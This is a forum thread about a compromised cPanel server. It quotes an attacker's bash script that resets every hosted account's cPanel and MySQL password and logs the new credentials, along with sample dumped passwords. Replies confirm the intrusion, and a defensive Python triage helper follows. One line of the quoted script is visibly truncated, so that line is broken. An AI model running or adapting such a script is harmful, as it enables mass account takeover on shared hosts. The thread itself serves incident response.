Suspicious file in my root folder
I was hacked a few days ago and I recently found the following script in my root folder called sss.sh
#!/bin/bash
#Changes every cPanel password on the server and stores the credentials in ~/newCredentials
#$newPassword is a randomly generated password with 10 characters
export ALLOW_PASSWORD_CHANGE=1
ls -la /home | awk '{print $3}' | grep -v root | grep -v wheel | grep -v cpanel | grep -v apache | grep -v csf | grep -v '^$' > /tmp/usersforchpass
for i in `more /tmp/usersforchpass `
do
newPassword='Ahley@'$(> ~/cpanel.txt
echo "" >> ~/newCredentials
/scripts/chpass $i $newPassword
/scripts/mysqlpasswd $i $newPassword
done
Can anyone confirm if this is a valid cpanel script? There is also a text file called cpanel.txt
Host/IP|africaexxxxx|Ahley@oOMrNx#74
Host/IP|buyanxxxxx|Ahley@MaxNGa#74
Host/IP|celebrixxxx|Ahley@OLVWMg#74
The xxxx is the rest of a domain's hostname. There is also the newCredentials file mentioned in the script; it seems blank when I open it in a text editor, has no extension, and is not a text file. Maybe I am worrying about nothing, but these files have me worried since I had to delete 50% of my domains for phishing scripts in the last few days.
It is not a cPanel script. This, when run, would change all the account passwords and let the person who ran it get a list of them. If this was in /root then you definitely have a very high level intrusion.
This is indeed not a valid cPanel script. As @GOT suggested, if this was in /root or anywhere that was not a user-level directory, a root compromise could be a factor. If you'd like to find out for sure you're welcome to open a ticket and our analysts can investigate.
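Both answers make the same point: every account listed in cpanel.txt now has a cPanel and MySQL password known to whoever ran the script, so the first job after containment is to enumerate those accounts and rotate them again. The following triage helper is an added example written for this thread, not cPanel code and not anything from the original post. It parses the `Host/IP|user|password` layout shown in the quoted cpanel.txt lines, lists the affected accounts, spots the fixed prefix/suffix the dumped passwords share, and checks the home directory for the three file names named in the thread (sss.sh, cpanel.txt, newCredentials). The sample dump embedded below is constructed: the password strings follow the ones quoted in the post, the usernames are placeholders.

```python
"""Triage helper for a cPanel credential dump like the cpanel.txt described above.

Added example for this thread; not cPanel's code and not the poster's script.
Run offline against the constructed sample, or pass real file contents to
triage_report() on the affected server.
"""
import os

# Constructed sample in the same 'Host/IP|user|password' layout as the quoted
# cpanel.txt. Usernames are placeholders, not the poster's accounts.
SAMPLE_DUMP = """Host/IP|exampleacct1|Ahley@oOMrNx#74
Host/IP|exampleacct2|Ahley@MaxNGa#74

this line is not a credential record
Host/IP|exampleacct3|Ahley@OLVWMg#74
"""

# File names taken from the post; their presence in /root is the indicator.
INDICATOR_FILES = ("sss.sh", "cpanel.txt", "newCredentials")


def parse_credential_dump(text):
    """Return (host, user, password) tuples for every well-formed dump line.

    Lines that do not have exactly three pipe-separated fields, or that have an
    empty username, are skipped rather than treated as records.
    """
    records = []
    for line in text.splitlines():
        parts = line.strip().split("|")
        if len(parts) != 3 or not parts[1]:
            continue
        records.append(tuple(parts))
    return records


def affected_accounts(text):
    """Sorted, de-duplicated list of usernames whose passwords were dumped."""
    return sorted({user for _, user, _ in parse_credential_dump(text)})


def shared_password_pattern(text):
    """Return (prefix, suffix) common to all dumped passwords, or None.

    The script in the thread wrapped a short random core in a fixed prefix and
    suffix; recovering those lets an admin search auth logs for the pattern.
    """
    passwords = [pw for _, _, pw in parse_credential_dump(text)]
    if len(passwords) < 2:
        return None
    prefix = os.path.commonprefix(passwords)
    suffix = os.path.commonprefix([p[::-1] for p in passwords])[::-1]
    if not prefix and not suffix:
        return None
    return prefix, suffix


def find_indicator_files(home_dir, exists=os.path.exists):
    """Indicator file names present in home_dir (e.g. /root).

    `exists` is injectable so the check can be exercised without touching disk.
    """
    return sorted(
        name for name in INDICATOR_FILES if exists(os.path.join(home_dir, name))
    )


def triage_report(dump_text, home_dir="/root"):
    """Human-readable summary: accounts to rotate, password pattern, files found."""
    users = affected_accounts(dump_text)
    lines = [
        f"{len(users)} account(s) whose cPanel and MySQL passwords must be rotated:"
    ]
    lines.extend(f"  - {user}" for user in users)
    pattern = shared_password_pattern(dump_text)
    if pattern:
        lines.append(
            f"all dumped passwords share prefix {pattern[0]!r} and suffix "
            f"{pattern[1]!r}; search authentication logs for that pattern"
        )
    present = find_indicator_files(home_dir)
    lines.append(f"indicator files present in {home_dir}: {present or 'none'}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(triage_report(SAMPLE_DUMP))
```

The parser deliberately ignores anything that is not a three-field record, so a dump with stray blank lines or shell output mixed in still yields the right account list. The `exists` parameter on `find_indicator_files` is only there so the file check can be tested without creating files; on the server you would call `triage_report(open("/root/cpanel.txt").read())` as root.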